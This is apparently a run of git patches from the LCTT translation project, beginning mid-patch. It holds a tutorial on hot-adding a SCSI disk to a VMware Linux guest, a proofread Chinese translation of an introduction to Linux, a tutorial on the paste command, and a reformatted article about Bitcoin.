+As a system admin, I need to use additional hard drives to provide more storage space or to separate system data from user data. This procedure, adding physical block devices to virtualized guests, describes how to add a hard drive on the host to a virtualized guest running Linux under VMware software.
+
+It is possible to add or remove a SCSI device explicitly, or to re-scan an entire SCSI bus, without rebooting a running Linux VM guest. This how-to was tested under VMware Server and VMware Workstation v6.0 (but should work with older versions too). All instructions were tested on RHEL, Fedora, CentOS and Ubuntu Linux guest/host operating systems.
+
+
+## Step # 1: Add a New Disk To Vm Guest
+
+First, you need to add a hard disk by visiting the VMware hardware settings menu.
+Click on VM > Settings
+
+![Fig.01: Vmware Virtual Machine Settings ][1]
+
+Alternatively, you can press CTRL + D to bring up the settings dialog box.
+
+Click on Add+ to add new hardware to the guest:
+
+![Fig.02: VMWare adding a new hardware][2]
+
+Select hardware type Hard disk and click on Next
+![Fig.03 VMware Adding a new disk wizard ][3]
+
+Select create a new virtual disk and click on Next
+
+![Fig.04: Vmware Wizard Disk ][4]
+
+Set virtual disk type to SCSI and click on Next
+
+![Fig.05: Vmware Virtual Disk][5]
+
+Set maximum disk size as per your requirements and click on Next
+
+![Fig.06: Finalizing Disk Virtual Addition ][6]
+
+Finally, set file location and click on Finish.
+
+## Step # 2: Rescan the SCSI Bus to Add a SCSI Device Without rebooting the VM
+
+A rescan can be issued by typing the following commands:
+`echo "- - -" > /sys/class/scsi_host/host#/scan
+fdisk -l
+tail -f /var/log/messages`
+Sample outputs:
+![Linux Vmware Rescan New Scsi Disk Without Reboot][7]
+Replace host# with the actual value, such as host0. You can find the scsi_host value using the following command:
+`# ls /sys/class/scsi_host`
+Output:
+```
+host0
+```
+
+Now type the following to send a rescan request:
+`echo "- - -" > /sys/class/scsi_host/host0/scan
+fdisk -l
+tail -f /var/log/messages`
+Sample Outputs:
+```
+Jul 18 16:29:39 localhost kernel: Vendor: VMware, Model: VMware Virtual S Rev: 1.0
+Jul 18 16:29:39 localhost kernel: Type: Direct-Access ANSI SCSI revision: 02
+Jul 18 16:29:39 localhost kernel: target0:0:1: Beginning Domain Validation
+Jul 18 16:29:39 localhost kernel: target0:0:1: Domain Validation skipping write tests
+Jul 18 16:29:39 localhost kernel: target0:0:1: Ending Domain Validation
+Jul 18 16:29:39 localhost kernel: target0:0:1: FAST-40 WIDE SCSI 80.0 MB/s ST (25 ns, offset 127)
+Jul 18 16:29:39 localhost kernel: SCSI device sdb: 2097152 512-byte hdwr sectors (1074 MB)
+Jul 18 16:29:39 localhost kernel: sdb: Write Protect is off
+Jul 18 16:29:39 localhost kernel: sdb: cache data unavailable
+Jul 18 16:29:39 localhost kernel: sdb: assuming drive cache: write through
+Jul 18 16:29:39 localhost kernel: SCSI device sdb: 2097152 512-byte hdwr sectors (1074 MB)
+Jul 18 16:29:39 localhost kernel: sdb: Write Protect is off
+Jul 18 16:29:39 localhost kernel: sdb: cache data unavailable
+Jul 18 16:29:39 localhost kernel: sdb: assuming drive cache: write through
+Jul 18 16:29:39 localhost kernel: sdb: unknown partition table
+Jul 18 16:29:39 localhost kernel: sd 0:0:1:0: Attached scsi disk sdb
+Jul 18 16:29:39 localhost kernel: sd 0:0:1:0: Attached scsi generic sg1 type 0
+Jul 18 16:29:39 localhost kernel: Vendor: VMware, Model: VMware Virtual S Rev: 1.0
+Jul 18 16:29:39 localhost kernel: Type: Direct-Access ANSI SCSI revision: 02
+Jul 18 16:29:39 localhost kernel: target0:0:2: Beginning Domain Validation
+Jul 18 16:29:39 localhost kernel: target0:0:2: Domain Validation skipping write tests
+Jul 18 16:29:39 localhost kernel: target0:0:2: Ending Domain Validation
+Jul 18 16:29:39 localhost kernel: target0:0:2: FAST-40 WIDE SCSI 80.0 MB/s ST (25 ns, offset 127)
+Jul 18 16:29:39 localhost kernel: SCSI device sdc: 2097152 512-byte hdwr sectors (1074 MB)
+Jul 18 16:29:39 localhost kernel: sdc: Write Protect is off
+Jul 18 16:29:39 localhost kernel: sdc: cache data unavailable
+Jul 18 16:29:39 localhost kernel: sdc: assuming drive cache: write through
+Jul 18 16:29:39 localhost kernel: SCSI device sdc: 2097152 512-byte hdwr sectors (1074 MB)
+Jul 18 16:29:39 localhost kernel: sdc: Write Protect is off
+Jul 18 16:29:39 localhost kernel: sdc: cache data unavailable
+Jul 18 16:29:39 localhost kernel: sdc: assuming drive cache: write through
+Jul 18 16:29:39 localhost kernel: sdc: unknown partition table
+Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi disk sdc
+Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi generic sg2 type 0
+```
+
+### How Do I Delete a Single Device Called /dev/sdc?
+
+In addition to re-scanning the entire bus, a specific device can be added or an existing device deleted using the following commands:
+`# echo 1 > /sys/block/devName/device/delete
+# echo 1 > /sys/block/sdc/device/delete`
+
+### How Do I Add a Single Device Called /dev/sdc?
+
+To add a single device explicitly, use the following syntax:
+```
+# echo "scsi add-single-device <H> <B> <T> <L>" > /proc/scsi/scsi
+```
+
+Where,
+
+ * <H> : Host
+ * <B> : Bus (Channel)
+ * <T> : Target (Id)
+ * <L> : LUN numbers
+
+For example, to add /dev/sdc with host # 0, bus # 0, target # 2, and LUN # 0, enter:
+`# echo "scsi add-single-device 0 0 2 0">/proc/scsi/scsi
+# fdisk -l
+# cat /proc/scsi/scsi`
+Sample Outputs:
+```
+Attached devices:
+Host: scsi0 Channel: 00 Id: 00 Lun: 00
+ Vendor: VMware, Model: VMware Virtual S Rev: 1.0
+ Type: Direct-Access ANSI SCSI revision: 02
+Host: scsi0 Channel: 00 Id: 01 Lun: 00
+ Vendor: VMware, Model: VMware Virtual S Rev: 1.0
+ Type: Direct-Access ANSI SCSI revision: 02
+Host: scsi0 Channel: 00 Id: 02 Lun: 00
+ Vendor: VMware, Model: VMware Virtual S Rev: 1.0
+ Type: Direct-Access ANSI SCSI revision: 02
+```
+
+## Step #3: Format a New Disk
+
+Now, you can create a partition using [fdisk and format it using the mkfs.ext3][8] command:
+`# fdisk /dev/sdc
+### [if you want ext3 fs] ###
+# mkfs.ext3 /dev/sdc3
+### [if you want ext4 fs] ###
+# mkfs.ext4 /dev/sdc3`
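+
+If you have not used fdisk interactively before, here is a rough sketch of the keystrokes for creating the partition used above (prompts vary slightly between fdisk versions):
+
+```
+# fdisk /dev/sdc
+# at the fdisk prompt, the keystrokes are roughly:
+#   n      (new partition)
+#   p      (primary partition)
+#   3      (partition number, so the device becomes /dev/sdc3)
+#   ENTER  (accept the default first cylinder/sector)
+#   ENTER  (accept the default last cylinder/sector, i.e. use the whole disk)
+#   w      (write the partition table and exit)
+```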
+
+## Step #4: Create a Mount Point And Update /etc/fstab
+
+`# mkdir /disk3`
+Open /etc/fstab file, enter:
+`# vi /etc/fstab`
+Append as follows:
+```
+/dev/sdc3 /disk3 ext3 defaults 1 2
+```
+
+For ext4 fs:
+```
+/dev/sdc3 /disk3 ext4 defaults 1 2
+```
+
+Save and close the file.
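+
+To mount the new filesystem right away without rebooting, a quick sketch (assuming the /disk3 mount point and fstab entry created above):
+
+```
+# mount /disk3
+# df -H /disk3
+```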
+
+#### Optional Task: Label the partition
+
+[You can label the partition using the e2label command][9]. For example, if you want to label the new partition as /backupDisk, enter:
+`# e2label /dev/sdc3 /backupDisk`
+See "[The importance of Linux partitions][10]" for more info.
+
+## About the Author
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][11], [Facebook][12], [Google+][13].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/tips/vmware-add-a-new-hard-disk-without-rebooting-guest.html
+
+作者:[Vivek Gite][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/media/new/tips/2009/07/virtual-machine-settings-1.png (Vmware Virtual Machine Settings )
+[2]:https://www.cyberciti.biz/media/new/tips/2009/07/vmware-add-hardware-wizard-2.png (VMWare adding a new hardware)
+[3]:https://www.cyberciti.biz/media/new/tips/2009/07/vmware-add-hardware-anew-disk-3.png (VMware Adding a new disk wizard )
+[4]:https://www.cyberciti.biz/media/new/tips/2009/07/vmware-add-hardware-4.png (Vmware Wizard Disk )
+[5]:https://www.cyberciti.biz/media/new/tips/2009/07/add-hardware-5.png (Vmware Virtual Disk)
+[6]:https://www.cyberciti.biz/media/new/tips/2009/07/vmware-final-disk-file-add-hdd-6.png (Finalizing Disk Virtual Addition)
+[7]:https://www.cyberciti.biz/media/new/tips/2009/07/vmware-linux-rescan-hard-disk.png (Linux Vmware Rescan New Scsi Disk Without Reboot)
+[8]:https://www.cyberciti.biz/faq/linux-disk-format/
+[9]:https://www.cyberciti.biz/faq/linux-modify-partition-labels-command-to-change-diskname/
+[10]:https://www.cyberciti.biz/faq/linux-partition-howto-set-labels/ (how to label a Linux partition)
+
+## Conclusion
+
+The VMware guest now has an additional virtualized storage device. The procedure works for all physical block devices; this includes CD-ROM, DVD and floppy devices. Next time I will write about adding an additional virtualized storage device using XEN software.
Date: Sun, 7 Jan 2018 13:03:53 +0800
Subject: [PATCH 131/371] PRF:20171031 Migrating to Linux- An Introduction.md
@stevenzdg988
---
...031 Migrating to Linux- An Introduction.md | 71 +++++++++++--------
1 file changed, 43 insertions(+), 28 deletions(-)
diff --git a/translated/tech/20171031 Migrating to Linux- An Introduction.md b/translated/tech/20171031 Migrating to Linux- An Introduction.md
index 6128c5ccd0..776aac13cc 100644
--- a/translated/tech/20171031 Migrating to Linux- An Introduction.md
+++ b/translated/tech/20171031 Migrating to Linux- An Introduction.md
@@ -1,52 +1,67 @@
-
-迁移到 Linux :入门介绍
+迁移到 Linux :入门介绍
======
+
![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/migrating-to-linux.jpg?itok=sjcGK0SY)
-运行 Linux 的计算机系统到遍布每个角落。Linux 运行我们的互联网服务,从谷歌搜索到“脸书” ```(Facebook)```,等等。Linux 也在很多设备上运行,包括我们的智能手机、电视,甚至汽车。当然,Linux 也可以运行在您的桌面系统上。如果您是 Linux 新手,或者您想在您的桌面计算机上尝试一些不同的东西,这篇文章将简要地介绍其基础知识,并帮助您从另一个系统迁移到 Linux。
-切换到不同的操作系统可能是一个挑战,因为每个操作系统都提供了不同的操作方法。其在一个系统上的第二特性可能会阻碍其在另一个系统正常使用,因此我们需要到网上或书本上查找怎样操作。
-### Windows 与 Linux 的区别 ```来自于法语(万岁的区别)--来自于 wiktionary ```
+> 这个新文章系列将帮你从其他操作系统迁移到 Linux。
-要开始使用 Linux,您可能会注意到,Linux 的打包方式不同。在其他操作系统中,许多组件被捆绑在一起,只是包的一部分。然而,在 Linux 中,每个组件都被分别调用。举个例子来说,在 Windows 下,图形界面只是操作系统的一部分。而在 Linux 下,您可以从多个图形环境中进行选择,比如 GNOME、KDE Plasma、Cinnamon 和 MATE 等。
-At a high level, a Linux installation includes the following things:
-在高级别上,Linux安装包括以下内容:
- 1. 内核
- 2. 系统程序和文件驻留在磁盘上
- 3. 图形环境
- 4. 包管理器
- 5. 应用程序
+运行 Linux 的计算机系统到遍布在每个角落。Linux 运行着从谷歌搜索到“脸书”等等各种互联网服务。Linux 也在很多设备上运行,包括我们的智能手机、电视,甚至汽车。当然,Linux 也可以运行在您的桌面系统上。如果您是 Linux 新手,或者您想在您的桌面计算机上尝试一些不同的东西,这篇文章将简要地介绍其基础知识,并帮助您从另一个系统迁移到 Linux。
+切换到不同的操作系统可能是一个挑战,因为每个操作系统都提供了不同的操作方法。其在一个系统上的习惯可能会对另一个系统的使用形成阻挠,因此我们需要到网上或书本上查找怎样操作。
+### Windows 与 Linux 的区别
+
+(LCTT 译注:本节标题 Vive la différence ,来自于法语,意即“差异万岁”——来自于 wiktionary)
+
+要开始使用 Linux,您可能会注意到,Linux 的打包方式不同。在其他操作系统中,许多组件被捆绑在一起,只是该软件包的一部分。然而,在 Linux 中,每个组件都被分别调用。举个例子来说,在 Windows 下,图形界面只是操作系统的一部分。而在 Linux 下,您可以从多个图形环境中进行选择,比如 GNOME、KDE Plasma、Cinnamon 和 MATE 等。
+
+从更高层面上看,一个 Linux 包括以下内容:
+
+1. 内核
+2. 驻留在磁盘上的系统程序和文件
+3. 图形环境
+4. 包管理器
+5. 应用程序
### 内核
-操作系统的核心称为内核。内核是引擎罩下的引擎。它允许多个应用程序同时运行,并协调它们对公共服务和设备的访问,从而使所有设备运行顺畅。
-### 系统程序和文件(系统)
+操作系统的核心称为内核。内核是引擎罩下的引擎。它允许多个应用程序同时运行,并协调它们对公共服务和设备的访问,从而使所有设备运行顺畅。
-系统程序位于文件和目录的标准层次结构中的磁盘上。这些系统程序和文件包括后台运行的服务(称为守护进程)、各种操作的实用程序、配置文件和日志文件。
+### 系统程序和文件
-这些系统程序不是在内核中运行,而是执行基本系统操作的应用程序——例如,设置日期和时间,并在网络上连接,这样你就可以上网了。
+系统程序以标准的文件和目录的层次结构位于磁盘上。这些系统程序和文件包括后台运行的服务(称为守护进程)、用于各种操作的实用程序、配置文件和日志文件。
-这里包含了初始化(init)程序——最新运行应用程序。该程序负责启动所有后台服务(如WEB服务器)、启动网络链接和启动图形环境。这个初始化(init)程序将根据需要启动其他系统程序。
+这些系统程序不是在内核中运行,而是执行基本系统操作的程序——例如,设置日期和时间,以及连接网络以便你可以上网。
+
+这里包含了初始化程序——它是最初运行的程序。该程序负责启动所有后台服务(如 Web 服务器)、启动网络连接和启动图形环境。这个初始化程序将根据需要启动其它系统程序。
其他系统程序为简单的任务提供便利,比如添加用户和组、更改密码和配置磁盘。
+
### 图形环境
-图形环境实际上只是更多的系统程序和文件。图形环境提供了常用的菜单窗口、鼠标指针、对话框、状态和指示器等。
-需要注意的是,您不需要使用最初安装的图形环境。如果你愿意,你可以把它另外的形式。每个图形环境都有不同的特性。有些看起来更像 Apple OS X,有些看起来更像 Windows,有些则是独一无二的,不要试图模仿其他的图形界面。
+图形环境实际上只是更多的系统程序和文件。图形环境提供了常用的带有菜单的窗口、鼠标指针、对话框、状态和指示器等。
+
+需要注意的是,您不是必须需要使用原本安装的图形环境。如果你愿意,你可以把它换成其它的。每个图形环境都有不同的特性。有些看起来更像 Apple OS X,有些看起来更像 Windows,有些则是独特的而不试图模仿其他的图形界面。
+
### 包管理器
-包管理器在不同的系统中很难被我们把握,但是现在有一个人们非常熟悉的类似的系统——应用程序商店。软件包系统实际上是为 Linux 存储应用程序。您可以使用包管理器来选择您想要的应用程序,而不是从该web站点安装这个应用程序,以及从另一个站点来安装其他应用程序。然后,包管理器从预先构建的开放源码应用程序的中心知识库安装应用程序。
+对于来自不同操作系统的人来说,包管理器比较难以掌握,但是现在有一个人们非常熟悉的类似的系统——应用程序商店。软件包系统实际上就是 Linux 的应用程序商店。您可以使用包管理器来选择您想要的应用程序,而不是从一个网站安装这个应用程序,而从另一个网站来安装那个应用程序。然后,包管理器会从预先构建的开源应用程序的中心仓库安装应用程序。
+
### 应用程序
-Linux附带了许多预安装的应用程序。您可以从包管理器获得更多。许多应用程序相当棒,其他人需要工作(?)。有时,同一个应用程序在 Windows 或 Mac OS 或 Linux 上运行的版本会不同。
-例如,您可以使用 Firefox 浏览器和 Thunderbird (用于电子邮件)。您可以使用 LibreOffice 作为 Microsoft Office 的替代品,并通过 Valve's Steam 程序运行游戏。您甚至可以在 Linux 上使用 WINE 来运行一些本地 Windows 应用程序。
+Linux 附带了许多预安装的应用程序。您可以从包管理器获得更多。许多应用程序相当棒,另外一些还需要改进。有时,同一个应用程序在 Windows 或 Mac OS 或 Linux 上运行的版本会不同。
+
+例如,您可以使用 Firefox 浏览器和 Thunderbird (用于电子邮件)。您可以使用 LibreOffice 作为 Microsoft Office 的替代品,并通过 Valve 的 Steam 程序运行游戏。您甚至可以在 Linux 上使用 WINE 来运行一些 Windows 原生的应用程序。
+
### 安装 Linux
-第一步通常是安装Linux发行版。你可能听说过 Red Hat、Ubuntu、Fedora、Arch Linux 和 SUSE,等等。这些是 Linux 的不同发行版。
-如果没有 Linux 发行版,则必须分别安装每个组件。许多组件是由不同人群开发和提供的,因此单独安装每个组件将是一项冗长而乏味的任务。幸运的是,构建 ```distros``` 的人会为您做这项工作。他们抓取所有的组件,构建它们,确保它们一起工作,然后将它们打包在一个单独的安装进程中。
-各种发行版可能会做出不同的选择,使用不同的组件,但它仍然是 Linux。应用程序被开发在一个发行版中却经常在其他发行版上运行的很好。
-如果你是一个Linux初学者,想尝试Linux,我推荐[Ubuntu 安装][1]。还有其他的发行版也可以尝试: Linux Mint、Fedora、Debian、Zorin OS、Elementary OS等等。在以后的文章中,我们将介绍 Linux 系统的其他方面,并提供关于如何开始使用 Linux 的更多信息。
+第一步通常是安装 Linux 发行版。你可能听说过 Red Hat、Ubuntu、Fedora、Arch Linux 和 SUSE,等等。这些都是 Linux 的不同发行版。
+
+如果没有 Linux 发行版,则必须分别安装每个组件。许多组件是由不同人群开发和提供的,因此单独安装每个组件将是一项冗长而乏味的任务。幸运的是,构建发行版的人会为您做这项工作。他们抓取所有的组件,构建它们,确保它们可以在一起工作,然后将它们打包在一个单一的安装套件中。
+
+各种发行版可能会做出不同的选择、使用不同的组件,但它仍然是 Linux。在一个发行版中开发的应用程序通常在其他发行版上运行的也很好。
+
+如果你是一个 Linux 初学者,想尝试 Linux,我推荐[安装 Ubuntu][1]。还有其他的发行版也可以尝试: Linux Mint、Fedora、Debian、Zorin OS、Elementary OS 等等。在以后的文章中,我们将介绍 Linux 系统的其他方面,并提供关于如何开始使用 Linux 的更多信息。
--------------------------------------------------------------------------------
@@ -55,7 +70,7 @@ via: https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-int
作者:[John Bonesio][a]
译者:[stevenzdg988](https://github.com/stevenzdg988)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From b0572896c20c40435df0392b9d52efa1f5101781 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 13:04:18 +0800
Subject: [PATCH 132/371] PUB:20171031 Migrating to Linux- An Introduction.md
@stevenzdg988 https://linux.cn/article-9212-1.html
---
.../20171031 Migrating to Linux- An Introduction.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171031 Migrating to Linux- An Introduction.md (100%)
diff --git a/translated/tech/20171031 Migrating to Linux- An Introduction.md b/published/20171031 Migrating to Linux- An Introduction.md
similarity index 100%
rename from translated/tech/20171031 Migrating to Linux- An Introduction.md
rename to published/20171031 Migrating to Linux- An Introduction.md
From 2bc4c04c9e6c8e45738572387800d9fb36da7a26 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 13:05:39 +0800
Subject: [PATCH 133/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20paste=20C?=
=?UTF-8?q?ommand=20Explained=20For=20Beginners=20(5=20Examples)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nd Explained For Beginners (5 Examples).md | 100 ++++++++++++++++++
1 file changed, 100 insertions(+)
create mode 100644 sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
diff --git a/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md b/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
new file mode 100644
index 0000000000..c48115f050
--- /dev/null
+++ b/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
@@ -0,0 +1,100 @@
+Linux paste Command Explained For Beginners (5 Examples)
+======
+
+Sometimes, while working on the command line in Linux, there may arise a situation wherein you have to merge lines of multiple files to create more meaningful/useful data. Well, you'll be glad to know there exists a command line utility **paste** that does this for you. In this tutorial, we will discuss the basics of this command as well as the main features it offers using easy to understand examples.
+
+But before we do that, it's worth mentioning that all examples mentioned in this article have been tested on Ubuntu 16.04 LTS.
+
+### Linux paste command
+
+As already mentioned above, the paste command merges lines of files. Here's the tool's syntax:
+
+paste [OPTION]... [FILE]...
+
+And here's how the man page of paste explains it:
+```
+Write lines consisting of the sequentially corresponding lines from each FILE, separated by TABs,
+to standard output. With no FILE, or when FILE is -, read standard input.
+```
+
+The following Q&A-styled examples should give you a better idea on how paste works.
+
+### Q1. How to join lines of multiple files using paste command?
+
+Suppose we have three files - file1.txt, file2.txt, and file3.txt - with the following contents:
+
+[![How to join lines of multiple files using paste command][1]][2]
+
+If the task is to merge the lines of these files in a way that each row of the final output contains the index, country, and continent, then you can do that using paste in the following way:
+
+paste file1.txt file2.txt file3.txt
+
+[![result of merging lines][3]][4]
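+
+In case the linked screenshots are not available, here is a minimal sketch with hypothetical file contents (the files used in the article differ) showing the default TAB-separated merge:
+
+```
+$ cat file1.txt
+1
+2
+$ cat file2.txt
+India
+Kenya
+$ cat file3.txt
+Asia
+Africa
+$ paste file1.txt file2.txt file3.txt
+1	India	Asia
+2	Kenya	Africa
+```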
+
+### Q2. How to apply delimiters when using paste?
+
+Sometimes, there can be a requirement to add a delimiting character between entries of each resulting row. This can be done using the **-d** command line option, which requires you to provide the delimiting character you want to use.
+
+For example, to apply a colon (:) as a delimiting character, use the paste command in the following way:
+
+paste -d : file1.txt file2.txt file3.txt
+
+Here's the output this command produced on our system:
+
+[![How to apply delimiters when using paste][5]][6]
+
+### Q3. How to change the way in which lines are merged?
+
+By default, the paste command merges lines in a way that entries in the first column belong to the first file, those in the second column to the second file, and so on. However, if you want, you can change this so that the merge operation happens row-wise.
+
+This you can do using the **-s** command line option.
+
+paste -s file1.txt file2.txt file3.txt
+
+Following is the output:
+
+[![How to change the way in which lines are merged][7]][8]
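+
+With the same hypothetical files as in the sketch above, the -s option turns each input file into a single row instead of a column:
+
+```
+$ paste -s file1.txt file2.txt file3.txt
+1	2
+India	Kenya
+Asia	Africa
+```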
+
+### Q4. How to use multiple delimiters?
+
+Yes, you can use multiple delimiters as well. For example, if you want to use both : and |, you can do that in the following way:
+
+paste -d ':|' file1.txt file2.txt file3.txt
+
+Following is the output:
+
+[![How to use multiple delimiters][9]][10]
+
+### Q5. How to make sure merged lines are NUL terminated?
+
+By default, lines merged through paste end in a newline. However, if you want, you can make them NUL terminated, something which you can do using the **-z** option.
+
+paste -z file1.txt file2.txt file3.txt
+
+### Conclusion
+
+As most of you'd agree, the paste command isn't difficult to understand and use. It may offer a limited set of command line options, but the tool does what it claims. You may not require it on a daily basis, but paste can be a real time-saver in some scenarios. Just in case you need it, [here's the tool's man page][11].
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-paste-command/
+
+作者:[Himanshu Arora][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/command-tutorial/paste-3-files.png
+[2]:https://www.howtoforge.com/images/command-tutorial/big/paste-3-files.png
+[3]:https://www.howtoforge.com/images/command-tutorial/paste-basic-usage.png
+[4]:https://www.howtoforge.com/images/command-tutorial/big/paste-basic-usage.png
+[5]:https://www.howtoforge.com/images/command-tutorial/paste-d-option.png
+[6]:https://www.howtoforge.com/images/command-tutorial/big/paste-d-option.png
+[7]:https://www.howtoforge.com/images/command-tutorial/paste-s-option.png
+[8]:https://www.howtoforge.com/images/command-tutorial/big/paste-s-option.png
+[9]:https://www.howtoforge.com/images/command-tutorial/paste-d-mult1.png
+[10]:https://www.howtoforge.com/images/command-tutorial/big/paste-d-mult1.png
+[11]:https://linux.die.net/man/1/paste
From 9376cc442c4a6782551e378bee15b2d7e7cbf423 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 13:20:44 +0800
Subject: [PATCH 134/371] reformat
---
sources/tech/20170919 What Are Bitcoins.md | 67 ++--------------------
1 file changed, 6 insertions(+), 61 deletions(-)
diff --git a/sources/tech/20170919 What Are Bitcoins.md b/sources/tech/20170919 What Are Bitcoins.md
index 3bc805e198..35ff986891 100644
--- a/sources/tech/20170919 What Are Bitcoins.md
+++ b/sources/tech/20170919 What Are Bitcoins.md
@@ -28,67 +28,16 @@ Also Read - [Bitkey A Linux Distribution Dedicated To Bitcoin Transactions][2]
### How To Mine Bitcoins and The Applications to Accomplish Necessary Bitcoin Management Tasks
-In the digital currency, BITCOIN mining and management requires additional software. There are numerous open source bitcoin management software that make it easy to make payments, receive payments, encrypt and backup of your bitcoins and also bitcoin mining software. There are sites such as;
+Mining and managing the Bitcoin digital currency requires additional software. There are numerous open source bitcoin management tools that make it easy to make and receive payments and to encrypt and back up your bitcoins, as well as bitcoin mining software. There are sites such as [Freebitcoin][4], where one earns free bitcoins by viewing ads, and [MoonBitcoin][5], another site one can sign up for free and earn bitcoins on. However, these are convenient only if one has spare time and a sizable network of friends participating in the same. There are many sites offering bitcoin mining, and one can easily sign up and start mining. One of the major secrets is referring as many people as you can to create a large network.
-[Freebitcoin][4]
-
-where one earns free bitcoins by viewing ads,
-
-[MoonBitcoin][5]
-
-is another site that one can sign up for free and earn bitcoins. However, it is convenient if one has spare time and a sizable network of friends participating in the same. There are many sites offering bitcoin mining and one can easily sign up and start mining. One of the major secrets is referring as many people as you can to create a large network.
-
-Applications required for use with bitcoins include the bitcoin wallet which allows one to safely keep bitcoins. This is just like the physical wallet using to keep hard cash but in a digital form. The wallet can be downloaded here -
-
-[Bitcoin - Wallet][6]
-
-. Other similar applications include; the
-
-[Blockchain][7]
-
-which works similar to the Bitcoin Wallet.
+Applications required for use with bitcoins include the bitcoin wallet, which allows one to safely keep bitcoins. This is just like the physical wallet used to keep hard cash, but in a digital form. The wallet can be downloaded here - [Bitcoin - Wallet][6]. Other similar applications include the [Blockchain][7] wallet, which works similarly to the Bitcoin Wallet.
The screenshots below show the Freebitco and MoonBitco mining sites respectively.
- [![freebitco bitcoin mining site](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/freebitco-bitcoin-mining-site_orig.jpg)][8] [![moonbitcoin bitcoin mining site](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/moonbitcoin-bitcoin-mining-site_orig.png)][9]
+ [![freebitco bitcoin mining site](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/freebitco-bitcoin-mining-site_orig.jpg)][8]
+ [![moonbitcoin bitcoin mining site](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/moonbitcoin-bitcoin-mining-site_orig.png)][9]
-There are various ways of acquiring the bitcoin currency. Some of them include the use of bitcoin mining rigs, purchasing of bitcoins in exchange markets and doing free bitcoin mining online. Purchasing of bitcoins can be done at;
-
-[MtGox][10]
-
-,
-
-[bitNZ][11]
-
-,
-
-[Bitstamp][12]
-
-,
-
-[BTC-E][13]
-
-,
-
-[VertEx][14]
-
-, etc.. Several mining open source applications are available online. These applications include; Bitminter,
-
-[5OMiner][15]
-
-,
-
-[BFG Miner][16]
-
-among others. These applications make use of some graphics card and processor features to generate bitcoins. The efficiency of mining bitcoins on a pc largely depends on the type of graphics card and the processor of the mining rig. Besides, there are many secure online storages for backing up bitcoins. These sites provide bitcoin storage services free of charge. Examples of bitcoin managing sites include;
-
-[xapo][17]
-
-,
-
-[BlockChain][18]
-
-etc. signing up on these sites require a valid email and phone number for verification. Xapo offers additional security through the phone application by requesting for verification whenever a new sign in is made.
+There are various ways of acquiring the bitcoin currency. Some of them include the use of bitcoin mining rigs, purchasing bitcoins in exchange markets, and doing free bitcoin mining online. Bitcoins can be purchased at [MtGox][10], [bitNZ][11], [Bitstamp][12], [BTC-E][13], [VertEx][14], etc. Several open source mining applications are available online, including Bitminter, [5OMiner][15] and [BFG Miner][16], among others. These applications make use of graphics card and processor features to generate bitcoins. The efficiency of mining bitcoins on a PC largely depends on the type of graphics card and the processor of the mining rig. Besides, there are many secure online storage services for backing up bitcoins. These sites provide bitcoin storage free of charge. Examples of bitcoin managing sites include [xapo][17], [BlockChain][18], etc. Signing up on these sites requires a valid email address and phone number for verification. Xapo offers additional security through its phone application by requesting verification whenever a new sign-in is made.
### Disadvantages Of Bitcoins
@@ -96,11 +45,7 @@ etc. signing up on these sites require a valid email and phone number for verifi
### Improvements Can be Made
-Based on the infancy of the
-
-[bitcoin technology][19]
-
-, there is still room for changes to make it more secure and reliable. Given more time, the bitcoin currency will be developed enough to provide flexibility as a common currency. For the bitcoin to succeed, many people need to be made aware of it besides being given information on how it works and its benefits.
+Given the infancy of the [bitcoin technology][19], there is still room for changes to make it more secure and reliable. Given more time, the bitcoin currency will be developed enough to provide flexibility as a common currency. For bitcoin to succeed, many people need to be made aware of it, as well as given information on how it works and its benefits.
--------------------------------------------------------------------------------
From 6a18c6dd8580e61cfb0d49cf0ea5c357c9f94b98 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 13:25:33 +0800
Subject: [PATCH 135/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Ansible:=20the=20?=
=?UTF-8?q?Automation=20Framework=20That=20Thinks=20Like=20a=20Sysadmin?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...n Framework That Thinks Like a Sysadmin.md | 200 ++++++++++++++++++
1 file changed, 200 insertions(+)
create mode 100644 sources/tech/20180105 Ansible- the Automation Framework That Thinks Like a Sysadmin.md
